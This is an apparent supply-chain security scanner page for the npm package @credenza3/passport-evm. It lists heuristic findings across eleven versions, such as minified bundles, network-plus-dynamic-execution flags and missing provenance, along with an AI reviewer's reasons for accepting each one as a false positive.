@credenza3/passport-evm
Credenza Passport
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:dist/index-h4gUPhx9.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentionally obfuscated. | ai | |
| source-diff | net-exec-file:dist/index-h4gUPhx9.js | AI (source-diff): Network calls and dynamic execution are part of normal Svelte/ethers frontend bundle, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-Bm7eyxqh.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentionally obfuscated. | ai | |
| source-diff | obfuscated-file:dist/Payment-BXvub930.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentionally obfuscated. | ai | |
| source-diff | obfuscated-file:dist/PassportId-CJfCwaof.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentionally obfuscated. | ai | |
| source-diff | obfuscated-file:dist/App-VHOLCm-t.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentionally obfuscated. | ai | |
| source-diff | net-exec-file:dist/index-DP6hVxgX.js | AI (source-diff): Network calls and dynamic execution are part of the Svelte runtime and EVM wallet integration, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-CsxAPSvJ.js | AI (source-diff): Vite-bundled Svelte component; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/Payment-BoS-CrfL.js | AI (source-diff): Vite-bundled Svelte component; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/PassportId-DFq0kTjP.js | AI (source-diff): Vite-bundled Svelte component; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/App-D_8AiOD9.js | AI (source-diff): Vite-bundled Svelte component; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/index-DP6hVxgX.js | AI (source-diff): Standard Vite/Svelte bundle output; readable runtime code, not intentional obfuscation. | ai | |
| source-diff | obfuscated-file:dist/App-_yMeKd6o.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentional obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-CyIvKpA2.js | AI (source-diff): Network calls and dynamic execution are part of Svelte runtime and Web3 SDK; not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-K8OByIhD.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentional obfuscation. | ai | |
| source-diff | obfuscated-file:dist/Payment-Dtp68V_5.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentional obfuscation. | ai | |
| source-diff | obfuscated-file:dist/PassportId-BeWQ-IDd.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentional obfuscation. | ai | |
| source-diff | obfuscated-file:dist/index-CyIvKpA2.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentional obfuscation. | ai | |
| source-diff | obfuscated-file:dist/App-pmcYlKkW.js | AI (source-diff): Svelte component bundle output from Vite build; minified but not obfuscated. | ai | |
| source-diff | net-exec-file:dist/index-BxjwuJ6T.js | AI (source-diff): Network calls are Web3/blockchain API calls; dynamic execution is Svelte runtime reactivity, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-Mm5PMzE9.js | AI (source-diff): Svelte component bundle output from Vite build; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/Payment-jc4oelQs.js | AI (source-diff): Svelte component bundle output from Vite build; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/PassportId-XAvunk85.js | AI (source-diff): Svelte component bundle output from Vite build; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/index-BxjwuJ6T.js | AI (source-diff): Standard Vite/Svelte 5 minified bundle; readable runtime code, not obfuscated malware. | ai | |
| source-diff | obfuscated-file:dist/PassportId-BGafLUDX.js | AI (source-diff): Vite-bundled Svelte component with inline SVG data URIs; standard build artifact. | ai | |
| source-diff | obfuscated-file:dist/index-B7xlI3d8.js | AI (source-diff): Standard Vite/Svelte minified bundle output; samples show framework runtime code, not obfuscated malware. | ai | |
| source-diff | obfuscated-file:dist/App-BpcMpO5f.js | AI (source-diff): Vite-bundled Svelte component; minified but readable framework patterns, no malicious indicators. | ai | |
| source-diff | obfuscated-file:dist/Payment-BnfOGIJ0.js | AI (source-diff): Vite-bundled Svelte component; minified CSS/component code, no malicious patterns. | ai | |
| source-diff | obfuscated-file:dist/Profile-CKEg_wd-.js | AI (source-diff): Vite-bundled Svelte component; inline SVG and framework code, standard build artifact. | ai | |
| source-diff | net-exec-file:dist/index-B7xlI3d8.js | AI (source-diff): Network calls and dynamic execution are part of Svelte runtime/async component loading, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-CLeV97_u.js | AI (source-diff): Vite-bundled Svelte 5 runtime; minified but not obfuscated, no malicious patterns. | ai | |
| source-diff | net-exec-file:dist/index-CLeV97_u.js | AI (source-diff): Svelte 5 runtime bundle; network calls are fetch-based API calls, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-DhUeQLyL.js | AI (source-diff): Standard Vite chunk; readable Svelte component with normal imports. | ai | |
| source-diff | obfuscated-file:dist/Payment-BLCWrBYu.js | AI (source-diff): Standard Vite chunk; readable Svelte component with normal imports. | ai | |
| source-diff | obfuscated-file:dist/PassportId-IVv403Q1.js | AI (source-diff): Standard Vite chunk; contains inline SVG data URIs and Svelte component code. | ai | |
| source-diff | obfuscated-file:dist/App-WHi3tPsO.js | AI (source-diff): Standard Vite chunk output; readable Svelte component code with normal imports. | ai | |
| source-diff | obfuscated-file:dist/App-DbY3XHVH.js | AI (source-diff): Standard Vite/Svelte build output; minified module with normal ES imports. | ai | |
| source-diff | net-exec-file:dist/index-BkHP76zy.js | AI (source-diff): Svelte 5 runtime bundle; network calls are Web3/blockchain API calls, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-BlD2oNUB.js | AI (source-diff): Standard Vite/Svelte build output; minified component code with normal imports. | ai | |
| source-diff | obfuscated-file:dist/Payment-B483NCnp.js | AI (source-diff): Standard Vite/Svelte build output; minified component code with normal imports. | ai | |
| source-diff | obfuscated-file:dist/PassportId-CLUDa9JW.js | AI (source-diff): Standard Vite/Svelte build output; contains only SVG data URIs and component code. | ai | |
| source-diff | obfuscated-file:dist/index-BkHP76zy.js | AI (source-diff): Vite-bundled Svelte 5 runtime; minified but not obfuscated, readable code visible in sample. | ai | |
| source-diff | obfuscated-file:dist/App-6EMaSmM_.js | AI (source-diff): Vite/Svelte component bundle; minification triggers rule but content is benign. | ai | |
| source-diff | encoded-string-file:dist/passport.umd.js | AI (source-diff): Long strings are CSS/font import rules injected by vite-plugin-css-injected-by-js; not payloads. | ai | |
| source-diff | net-exec-file:dist/index-Dllh0686.js | AI (source-diff): Network calls are Web3/API client calls; dynamic execution is Svelte runtime; no dropper pattern. | ai | |
| source-diff | obfuscated-file:dist/Profile-Ca8peQuw.js | AI (source-diff): Vite/Svelte component bundle; minification triggers rule but content is benign. | ai | |
| source-diff | obfuscated-file:dist/Payment-Cg6CLBP-.js | AI (source-diff): Vite/Svelte component bundle; minification triggers rule but content is benign. | ai | |
| source-diff | obfuscated-file:dist/PassportId-DN9CXXIx.js | AI (source-diff): Vite/Svelte component bundle; minification triggers rule but content is benign. | ai | |
| source-diff | obfuscated-file:dist/index-Dllh0686.js | AI (source-diff): Standard Vite-bundled Svelte framework output; minified but not malicious. | ai | |
| phantom-deps | phantom-dep:lean-qr | AI (phantom-deps): Declared runtime dep; phantom-dep heuristic false positive for bundled libraries. | ai | |
| phantom-deps | phantom-dep:@zerodevx/svelte-toast | AI (phantom-deps): Declared runtime dep; phantom-dep heuristic false positive for bundled libraries. | ai | |
| phantom-deps | phantom-dep:@credenza3/contracts | AI (phantom-deps): Same-org dep; phantom-dep heuristic false positive for bundled libraries. | ai | |
| install-scripts | install-script:preinstall | AI (install-scripts): only-allow pnpm enforces package manager; no code execution risk, stable pattern for this package. | ai | |
| phantom-deps | phantom-dep:lodash.merge | AI (phantom-deps): Declared runtime dep; phantom-dep heuristic false positive for bundled libraries. | ai | |
| phantom-deps | phantom-dep:ethers | AI (phantom-deps): Declared runtime dep used via bundled output; phantom-dep heuristic false positive for bundled libraries. | ai |
Versions (showing 11 of 11)
| Version | Deps | Published |
|---|---|---|
| 0.4.27 | 7 / 28 | |
| 0.4.26 | 7 / 28 | |
| 0.4.25 | 7 / 28 | |
| 0.4.24 | 7 / 28 | |
| 0.4.23 | 7 / 28 | |
| 0.4.22 | 7 / 28 | |
| 0.4.21 | 7 / 28 | |
| 0.4.20 | 7 / 28 | |
| 0.4.19 | 7 / 28 | |
| 0.4.18 | 7 / 28 | |
| 0.4.17 | 7 / 28 |
v0.4.27
7 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.26
7 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.25
8 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Modified file contains 5 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.24
7 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.23
7 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.22
8 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Modified file contains 5 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.21
8 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Modified file contains 5 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.20
8 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Modified file contains 5 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.19
2 findingsScript: npx only-allow pnpm
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.4.18
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.4.17
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.